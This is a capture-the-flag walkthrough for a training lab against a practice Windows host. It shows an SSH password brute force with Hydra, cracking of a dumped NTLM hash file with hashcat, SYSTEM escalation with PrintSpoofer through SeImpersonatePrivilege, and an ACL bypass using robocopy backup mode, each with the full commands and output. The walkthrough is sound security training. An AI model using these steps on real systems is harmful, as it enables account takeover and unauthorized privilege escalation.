Completing Skill Check Labs
Skill Check Labs are interactive, hands-on exercises designed to validate the knowledge and skills you've gained in this course through real-world scenarios. Each lab presents practical tasks that require you to apply what you've learned. Unlike other INE labs, solutions are not provided, challenging you to demonstrate your understanding and problem-solving abilities. Your performance is graded, allowing you to track progress and measure skill growth over time.
Lab Environment
A target machine is accessible at target.ine.local. Identify the services and capture the flags.
- Flag 1: An insecure ssh user named alice lurks in the system.
- Flag 2: Using the hashdump file discovered in the previous challenge, can you crack the hashes and compromise a user?
- Flag 3: Can you escalate privileges and read the flag in C://Windows//System32//config directory?
- Flag 4: Looks like the flag present in the Administrator's home denies direct access.
The following will be useful:
Wordlist: /usr/share/wordlists/metasploit/unix_passwords.txt
Tool: /root/Desktop/PrintSpoofer.exe
Tools:
- Nmap (port scanning)
- Hydra (online brute force)
- JohnTheRipper (hash cracking)
- PrintSpoofer (post-exploitation tool that escalates to SYSTEM on Windows by abusing SeImpersonatePrivilege: it coerces the Print Spooler service into connecting to a named pipe it controls and impersonates the resulting SYSTEM token.)
Nmap scan:
p_notes.txt:
cat p_notes.txt
# Nmap 7.94SVN scan initiated Sat Jan 17 23:51:19 2026 as: nmap -p- -oN p_notes.txt -v target.ine.local
Nmap scan report for target.ine.local (10.3.21.43)
Host is up (0.0028s latency).
Not shown: 65524 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49167/tcp open unknown
49182/tcp open unknown
Read data files from: /usr/bin/../share/nmap
# Nmap done at Sat Jan 17 23:51:37 2026 -- 1 IP address (1 host up) scanned in 18.01 seconds

n_notes.txt:
# Nmap 7.94SVN scan initiated Sat Jan 17 23:53:04 2026 as: nmap -p22,135,139,445,3389 -oN n_notes.txt -sC -sV -v target.ine.local
Nmap scan report for target.ine.local (10.3.21.43)
Host is up (0.0031s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_9.5 (protocol 2.0)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ssl/ms-wbt-server?
|_ssl-date: 2026-01-17T18:24:17+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=WIN-GQ7PTVEC6HL
| Issuer: commonName=WIN-GQ7PTVEC6HL
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-01-16T18:16:26
| Not valid after: 2026-07-18T18:16:26
| MD5: c97d:1d22:d4d3:dd1d:bc37:845f:9a4c:8964
|_SHA-1: 7bce:9ba7:5d93:6b10:b6e6:7532:9ea3:0cf2:d03c:6e7f
| rdp-ntlm-info:
| Target_Name: WIN-GQ7PTVEC6HL
| NetBIOS_Domain_Name: WIN-GQ7PTVEC6HL
| NetBIOS_Computer_Name: WIN-GQ7PTVEC6HL
| DNS_Domain_Name: WIN-GQ7PTVEC6HL
| DNS_Computer_Name: WIN-GQ7PTVEC6HL
| Product_Version: 6.3.9600
|_ System_Time: 2026-01-17T18:24:09+00:00
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:0:2:
|_ Message signing enabled but not required
| smb2-time:
| date: 2026-01-17T18:24:11
|_ start_date: 2026-01-17T18:16:24
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jan 17 23:54:17 2026 -- 1 IP address (1 host up) scanned in 73.13 seconds

Remarks: the target is a Windows host (OpenSSH for Windows, SMB on 139/445, RDP on 3389, certificate CN and NetBIOS name WIN-GQ7PTVEC6HL, Product_Version 6.3.9600 i.e. Windows 8.1 / Server 2012 R2). SMB signing is enabled but not required, which would be worth noting for NTLM relay in a real engagement. In a real penetration test every open port would be tested; that said, flag 1 points us directly in one direction.
Flag 1: An insecure ssh user named alice lurks in the system.
Using hydra, brute-force alice's password with the supplied wordlist /usr/share/wordlists/metasploit/unix_passwords.txt (hydra warns that SSH servers usually limit parallel sessions and suggests -t 4; it still succeeded with the default 16 tasks here):
hydra -l alice -P /usr/share/wordlists/metasploit/unix_passwords.txt target.ine.local ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-01-18 00:04:42
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1009 login tries (l:1/p:1009), ~64 tries per task
[DATA] attacking ssh://target.ine.local:22/
[22][ssh] host: target.ine.local login: alice password: princess1

Credentials found: alice:princess1
Post-exploitation methodology:
Local enumeration:
System information:
whoami /priv: nothing useful, alice only holds the two default user privileges.
C:\Users\alice>Whoami /priv
PRIVILEGES INFORMATION
- - - - - - - - - - -
Privilege Name Description State
============================= ============================== =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

whoami: current user.
alice@WIN-GQ7PTVEC6HL C:\Users\alice>Whoami
win-gq7ptvec6hl\alice

net users: list local users.
alice@WIN-GQ7PTVEC6HL C:\Users\alice>net users
User accounts for \\WIN-GQ7PTVEC6HL
-------------------------------------------------------------------------------
Administrator alice bonney
brock broody calvin
casey charlie charlot
chloe colin david
derek dexter elizabeth
Guest haley harry
jake jerry john
karen larry laura
molly paul ruthy
sabrina sherry ssm-user
timothy warren william
The command completed successfully.

net localgroup: list local groups.
alice@WIN-GQ7PTVEC6HL C:\Users\alice>Net localgroup
Aliases for \\WIN-GQ7PTVEC6HL
-------------------------------------------------------------------------------
*Access Control Assistance Operators
*Administrators
*Backup Operators
*Certificate Service DCOM Access
*Cryptographic Operators
*Distributed COM Users
*Event Log Readers
*Guests
*Hyper-V Administrators
*IIS_IUSRS
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Power Users
*Print Operators
*RDS Endpoint Servers
*RDS Management Servers
*RDS Remote Access Servers
*Remote Desktop Users
*Remote Management Users
*Replicator
*Users
*WinRMRemoteWMIUsers__
The command completed successfully.

Network enumeration:
alice@WIN-GQ7PTVEC6HL C:\Users\alice>Netstat -ano
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:22 0.0.0.0:0 LISTENING 804
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 596
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 1368
TCP 0.0.0.0:49152 0.0.0.0:0 LISTENING 400
TCP 0.0.0.0:49153 0.0.0.0:0 LISTENING 688
TCP 0.0.0.0:49154 0.0.0.0:0 LISTENING 720
TCP 0.0.0.0:49155 0.0.0.0:0 LISTENING 332
TCP 0.0.0.0:49167 0.0.0.0:0 LISTENING 488
TCP 0.0.0.0:49182 0.0.0.0:0 LISTENING 496
TCP 10.3.21.43:22 10.10.48.4:44593 ESTABLISHED 804
TCP 10.3.21.43:22 10.10.48.4:46666 ESTABLISHED 804
TCP 10.3.21.43:139 0.0.0.0:0 LISTENING 4
TCP 10.3.21.43:49213 10.3.20.31:443 ESTABLISHED 2260
TCP 10.3.21.43:49386 169.254.169.254:80 TIME_WAIT 0
TCP 10.3.21.43:49391 10.3.18.165:443 ESTABLISHED 2260
TCP [::]:22 [::]:0 LISTENING 804
TCP [::]:135 [::]:0 LISTENING 596
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:3389 [::]:0 LISTENING 1368
TCP [::]:49152 [::]:0 LISTENING 400
TCP [::]:49153 [::]:0 LISTENING 688
TCP [::]:49154 [::]:0 LISTENING 720
TCP [::]:49155 [::]:0 LISTENING 332
TCP [::]:49167 [::]:0 LISTENING 488
TCP [::]:49182 [::]:0 LISTENING 496
UDP 0.0.0.0:500 *:* 720
UDP 0.0.0.0:3389 *:* 1368
UDP 0.0.0.0:4500 *:* 720
UDP 0.0.0.0:5355 *:* 840
UDP 10.3.21.43:137 *:* 4
UDP 10.3.21.43:138 *:* 4
UDP [::]:500 *:* 720
UDP [::]:3389 *:* 1368
UDP [::]:4500 *:* 720
UDP [::]:5355 *:* 840

Nothing new on the network side: the listeners match the ports seen from outside, and the only outbound connections are to 10.3.20.31:443, 10.3.18.165:443 and the 169.254.169.254 cloud instance metadata endpoint (consistent with the ssm-user account). Back to the CTF: flag 2 tells us there is a hashdump.txt file in alice's directory.
dir
Volume in drive C has no label.
Volume Serial Number is AEDF-99BD
Directory of C:\Users\alice
01/17/2026 06:17 PM <DIR> .
01/17/2026 06:17 PM <DIR> ..
09/05/2020 07:55 AM <DIR> Contacts
09/05/2020 09:07 AM <DIR> Desktop
06/19/2024 11:42 AM <DIR> Documents
09/05/2020 09:11 AM <DIR> Downloads
09/05/2020 07:55 AM <DIR> Favorites
01/17/2026 06:17 PM 34 flag1.txt
06/20/2024 05:28 AM 2,416 hashdump.txt
09/05/2020 07:55 AM <DIR> Links
09/05/2020 07:55 AM <DIR> Music
09/05/2020 07:55 AM <DIR> Pictures
09/05/2020 07:55 AM <DIR> Saved Games
09/05/2020 07:55 AM <DIR> Searches
09/05/2020 07:55 AM <DIR> Videos
2 File(s) 2,450 bytes
13 Dir(s) 361,971,712 bytes free

Flag 2: Using the hashdump file discovered in the previous challenge, can you crack the hashes and compromise a user?
alice@WIN-GQ7PTVEC6HL C:\Users\alice>type hashdump.txt
alice:1015:aad3b435b51404eeaad3b435b51404ee:8883a4229c5553c9cca6856a53011e4c:::
bonney:1035:aad3b435b51404eeaad3b435b51404ee:281155baf68f6a9089146311a77d6d7c:::
brock:1037:aad3b435b51404eeaad3b435b51404ee:a45976f0c06a5d0b3e7223f05a76e4b5:::
broody:1022:aad3b435b51404eeaad3b435b51404ee:dc8c3ea7447407533af8575d0f3080bb:::
calvin:1036:aad3b435b51404eeaad3b435b51404ee:bed709ba1a1a570d47c8993f7b812ee8:::
casey:1040:aad3b435b51404eeaad3b435b51404ee:7e1718a7e439f61441d35f72e3b93da6:::
charlie:1029:aad3b435b51404eeaad3b435b51404ee:d481400542588758a2d37d9267a8ecf5:::
charlot:1038:aad3b435b51404eeaad3b435b51404ee:388df8e543c27c6c8498aee58198ebce:::
chloe:1018:aad3b435b51404eeaad3b435b51404ee:037c2978b606bafb2e1495a0e6de3180:::
colin:1020:aad3b435b51404eeaad3b435b51404ee:59b1564a32d45f7f9ab4f206e816b19f:::
david:1016:aad3b435b51404eeaad3b435b51404ee:ca8e025e9893e8ce3d2cbf847fc56814:::
derek:1032:aad3b435b51404eeaad3b435b51404ee:811f3a3aa4e96d4012229452a706828e:::
dexter:1043:aad3b435b51404eeaad3b435b51404ee:a85472bce5f04a9e464a4d2ec20f862f:::
elizabeth:1031:aad3b435b51404eeaad3b435b51404ee:f3c4214c99bb438ad82de744cb1d276c:::
haley:1030:aad3b435b51404eeaad3b435b51404ee:05cd20309cacd9d5680f78e6a59d578c:::
harry:1041:aad3b435b51404eeaad3b435b51404ee:ec628349a07c8bff5e81c497732f852c:::
jake:1026:aad3b435b51404eeaad3b435b51404ee:00d1b39ee2d85c0bdef9c3817c8fa090:::
jerry:1044:aad3b435b51404eeaad3b435b51404ee:17cb234cb58cd6b74e33013e46f1b12e:::
john:1017:aad3b435b51404eeaad3b435b51404ee:249934368a06559767bcbbc8a2596044:::
karen:1034:aad3b435b51404eeaad3b435b51404ee:079f7e374681d9394fd560ed11f6a212:::
larry:1039:aad3b435b51404eeaad3b435b51404ee:035c7acd2a04ad7a11df400b1933c4fc:::
laura:1028:aad3b435b51404eeaad3b435b51404ee:34c1da107e8abe2f4045dc6b9a0fb4d3:::
molly:1033:aad3b435b51404eeaad3b435b51404ee:3502da9acfd4b961e9baf41d784c7f2d:::
paul:1027:aad3b435b51404eeaad3b435b51404ee:ab7de9a600e3f6cd702e5dd46b026790:::
ruthy:1021:aad3b435b51404eeaad3b435b51404ee:f395f60844e01192225addcea30a29a4:::
sabrina:1042:aad3b435b51404eeaad3b435b51404ee:ad127b19268ac373645905190411637e:::
sherry:1025:aad3b435b51404eeaad3b435b51404ee:bf725db5fbddd83f98772c783d01507f:::
timothy:1024:aad3b435b51404eeaad3b435b51404ee:852939286b8c258ad0aeb103870d05f4:::
warren:1023:aad3b435b51404eeaad3b435b51404ee:ab21fb0a04f9d04eb56b2a274fa3b128:::
william:1019:aad3b435b51404eeaad3b435b51404ee:259e57531549fef4486d6a77285197b2:::

Bonney's hash is 281155baf68f6a9089146311a77d6d7c. Windows stores local account password hashes in the SAM (Security Accounts Manager) database, in two formats: the old LM hash (DES-based, case-insensitive, password split into two 7-character halves, trivially crackable) and the NT hash (MD4 of the UTF-16LE password, unsalted). NTLM is the network authentication protocol built on the NT hash; LM is the legacy one and is known to be weak. For more: https://www.janbasktraining.com/community/cyber-security/lm-vs-ntlm-whats-the-difference.

About the hashdump format (user:RID:LM:NT:::): the 2nd field is the account RID, the 3rd is the LM hash and the 4th, the one that differs per user, is the NT hash. The LM field is aad3b435b51404eeaad3b435b51404ee for every account: that is the well-known LM hash of the empty string, meaning LM hashing is disabled on this host and only the NT hash is worth attacking. Because the NT hash is unsalted, a candidate password hashed once can be compared against all 30 digests at the same time, so cracking the whole file costs the same as cracking one hash.
I could not crack Bonney's password, so I will try to crack all of them.
To do that, extract the 4th field with cut:
cut -d ":" -f 4 hashdump.txt > ntlm_hashes.txt
Then run the following (see https://hashcat.net/wiki/doku.php for the hash mode; 1000 is NTLM). hashcat can also be pointed at hashdump.txt directly with --username, which keeps the user:RID prefix and saves mapping cracked hashes back to accounts by hand:
hashcat -a 0 -m 1000 ntlm_hashes.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 5.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-haswell-AMD EPYC 7642 48-Core Processor, 47215/94495 MB (16384 MB allocatable), 48MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 30 digests; 30 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Salt
* Raw-Hash
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
Host memory required for this attack: 13 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
8883a4229c5553c9cca6856a53011e4c:princess1
ca8e025e9893e8ce3d2cbf847fc56814:orange
Approaching final keyspace - workload adjusted.
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 1000 (NTLM)
Hash.Target......: ntlm_hashes.txt
Time.Started.....: Sun Jan 18 00:54:57 2026 (4 secs)
Time.Estimated...: Sun Jan 18 00:55:01 2026 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 3904.1 kH/s (3.84ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 2/30 (6.67%) Digests (total), 2/30 (6.67%) Digests (new)
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[2a6272696467657330312a] -> $HEX[042a0337c2a156616d6f732103]
Started: Sun Jan 18 00:54:55 2026
Stopped: Sun Jan 18 00:55:01 2026

Credentials found:
- alice:princess1
- david:orange
After logging in as david (david:orange) over SSH, grab flag2.

Privilege escalation:
I chose to use winpeas.exe (/usr/share/peass/winpeas/winPEASx64.exe); to get it onto the target, nothing is simpler than scp over the SSH access we already have.
scp winPEASx64.exe david@target.ine.local:"C:\Temp"
david@target.ine.local's password:
winPEASx64.exe
Once it is there, run it with .\winPEASx64.exe log=resultats.txt. When it has finished, send the output file back to our Kali machine:
scp david@target.ine.local:C:/Temp/resultats.txt .
I noticed a colour problem when the process ran over the SSH session; now that the file is on our attacking machine, less -r lets the terminal interpret the escape sequences and render the right colours.
Looking at david's privileges, I recognise a well-known token impersonation case: SeImpersonatePrivilege, abusable with PrintSpoofer.
https://github.com/itm4n/PrintSpoofer
david@WIN-GQ7PTVEC6HL C:\Users\david>Whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
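The same privilege triage done programmatically, as an added example that is not part of these notes: it parses the whoami /priv listings for alice and david shown above (embedded as constructed copies of that output), diffs them to see what the second account bought us, and maps the abusable privileges to the escalation primitive each one gives. The mapping is my own summary of the standard list and the helper names are mine.

```python
import re

# Well-known privileges that give a local escalation path and the primitive each provides.
# Author's summary of the standard abusable-privilege list; not exhaustive.
ABUSABLE = {
    "SeImpersonatePrivilege": "impersonate a SYSTEM token from a coerced named-pipe client (PrintSpoofer, the Potato family)",
    "SeAssignPrimaryTokenPrivilege": "same token-abuse family as SeImpersonatePrivilege",
    "SeBackupPrivilege": "read any file regardless of its ACL with backup semantics (robocopy /b, reg save of SAM/SYSTEM)",
    "SeRestorePrivilege": "write any file or registry key regardless of its ACL",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object, then rewrite its ACL",
    "SeDebugPrivilege": "open any process (dump LSASS, inject into a SYSTEM process)",
    "SeLoadDriverPrivilege": "load a kernel driver (e.g. a known vulnerable signed driver)",
}

# First token is the privilege name, last token is the state; the description column in
# between has a variable width (compare the two listings), so columns are not used.
PRIV_RE = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$")


def parse_whoami_priv(text):
    """Parse `whoami /priv` output into {privilege_name: state}."""
    privs = {}
    for line in text.splitlines():
        m = PRIV_RE.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(2)
    return privs


def triage(privs):
    """Return [(privilege, state, primitive)] for every abusable privilege in the token.
    A 'Disabled' privilege is still reported: it is present in the token and its holder can
    enable it with AdjustTokenPrivileges, so it is just as exploitable as an 'Enabled' one."""
    return [(p, s, ABUSABLE[p]) for p, s in privs.items() if p in ABUSABLE]


def new_privileges(before, after):
    """Privileges gained by moving from one account to another."""
    return sorted(set(after) - set(before))


# Constructed copies of the two whoami /priv outputs captured above.
ALICE_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
"""

DAVID_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= =======
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Enabled
"""

if __name__ == "__main__":
    alice, david = parse_whoami_priv(ALICE_PRIV), parse_whoami_priv(DAVID_PRIV)
    print("gained by switching to david:", new_privileges(alice, david))
    for priv, state, how in triage(david):
        print(f"{priv} ({state}): {how}")
```

On this box the diff is a single privilege, SeImpersonatePrivilege, which is why the next step is PrintSpoofer rather than a longer winPEAS hunt.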
PrintSpoofer.exe must first be copied to the target from /root/Desktop, the same way as winPEAS. -i interacts with the new process in the current console, -c is the command to run as SYSTEM:
PrintSpoofer.exe -i -c cmd
C:\Windows\system32>Whoami
nt authority\system
C:\Windows\system32>Whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
=============================== ============================================= =======
SeCreateTokenPrivilege Create a token object Enabled
SeAssignPrimaryTokenPrivilege Replace a process level token Enabled
SeLockMemoryPrivilege Lock pages in memory Enabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeTcbPrivilege Act as part of the operating system Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeCreatePermanentPrivilege Create permanent shared objects Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeAuditPrivilege Generate security audits Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeTrustedCredManAccessPrivilege Access Credential Manager as a trusted caller Enabled
SeRelabelPrivilege Modify an object label Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled

Flag 3: Can you escalate privileges and read the flag in C://Windows//System32//config directory?
Flag 4: Looks like the flag present in the Administrator's home denies direct access.
After copying out flag 3, even as nt authority\system the ACL (Access Control List) on C:\Users\Administrator\flag blocks access:
C:\Users\Administrator>cd flag
Access is denied.
SeBackupPrivilege, enabled in the SYSTEM token above, lets a process open any file for reading with backup semantics, bypassing its ACL. robocopy's /b switch (backup mode) uses exactly that, so the file can be copied out and then read:
robocopy C:\Users\Administrator\flag C:\Temp flag4.txt /b
type C:\Temp\flag4.txt